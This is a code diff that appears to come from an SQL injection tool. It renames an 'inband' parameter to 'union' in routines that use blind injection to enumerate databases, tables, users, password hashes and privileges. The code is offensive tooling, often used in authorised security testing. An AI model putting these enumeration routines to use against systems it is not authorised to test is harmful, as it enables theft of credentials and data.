kb.hintValue = foundTbl
|
||||
foundTbl = safeSQLIdentificatorNaming(foundTbl, True)
|
||||
foundTbls[db].append(foundTbl)
|
||||
|
|
@ -431,7 +431,7 @@ class Search:
|
|||
query += colQuery
|
||||
query += whereDbsQuery
|
||||
query += whereTblsQuery
|
||||
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
|
||||
if not isNumPosStrValue(count):
|
||||
warnMsg = "no databases have tables containing column"
|
||||
|
|
@ -452,7 +452,7 @@ class Search:
|
|||
if Backend.isDbms(DBMS.DB2):
|
||||
query += ") AS foobar"
|
||||
query = agent.limitQuery(index, query)
|
||||
db = inject.getValue(query, inband=False, error=False)
|
||||
db = inject.getValue(query, union=False, error=False)
|
||||
db = safeSQLIdentificatorNaming(db)
|
||||
|
||||
if db not in dbs:
|
||||
|
|
@ -487,7 +487,7 @@ class Search:
|
|||
query = query % db
|
||||
query += " AND %s" % colQuery
|
||||
query += whereTblsQuery
|
||||
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
|
||||
if not isNumPosStrValue(count):
|
||||
warnMsg = "no tables contain column"
|
||||
|
|
@ -507,7 +507,7 @@ class Search:
|
|||
query += " AND %s" % colQuery
|
||||
query += whereTblsQuery
|
||||
query = agent.limitQuery(index, query)
|
||||
tbl = inject.getValue(query, inband=False, error=False)
|
||||
tbl = inject.getValue(query, union=False, error=False)
|
||||
kb.hintValue = tbl
|
||||
|
||||
tbl = safeSQLIdentificatorNaming(tbl, True)
|
||||
|
|
|
|||
|
|
@ -111,7 +111,7 @@ class Users:
|
|||
else:
|
||||
query = rootQuery.blind.count
|
||||
|
||||
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
|
||||
if not isNumPosStrValue(count):
|
||||
errMsg = "unable to retrieve the number of database users"
|
||||
|
|
@ -127,7 +127,7 @@ class Users:
|
|||
query = rootQuery.blind.query2 % index
|
||||
else:
|
||||
query = rootQuery.blind.query % index
|
||||
user = inject.getValue(query, inband=False, error=False)
|
||||
user = inject.getValue(query, union=False, error=False)
|
||||
|
||||
if user:
|
||||
kb.data.cachedUsers.append(user)
|
||||
|
|
@ -252,7 +252,7 @@ class Users:
|
|||
else:
|
||||
query = rootQuery.blind.count % user
|
||||
|
||||
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
|
||||
if not isNumPosStrValue(count):
|
||||
warnMsg = "unable to retrieve the number of password "
|
||||
|
|
@ -277,7 +277,7 @@ class Users:
|
|||
else:
|
||||
query = rootQuery.blind.query % (user, index)
|
||||
|
||||
password = inject.getValue(query, inband=False, error=False)
|
||||
password = inject.getValue(query, union=False, error=False)
|
||||
password = parsePasswordHash(password)
|
||||
passwords.append(password)
|
||||
|
||||
|
|
@ -467,7 +467,7 @@ class Users:
|
|||
else:
|
||||
query = rootQuery.blind.count % user
|
||||
|
||||
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
|
||||
if not isNumPosStrValue(count):
|
||||
if Backend.isDbms(DBMS.ORACLE) and not query2:
|
||||
|
|
@ -500,7 +500,7 @@ class Users:
|
|||
query = rootQuery.blind.query % (index, user)
|
||||
else:
|
||||
query = rootQuery.blind.query % (user, index)
|
||||
privilege = inject.getValue(query, inband=False, error=False)
|
||||
privilege = inject.getValue(query, union=False, error=False)
|
||||
|
||||
# In PostgreSQL we get 1 if the privilege is True,
|
||||
# 0 otherwise
|
||||
|
|
|
|||
Loading…
Reference in New Issue
Block a user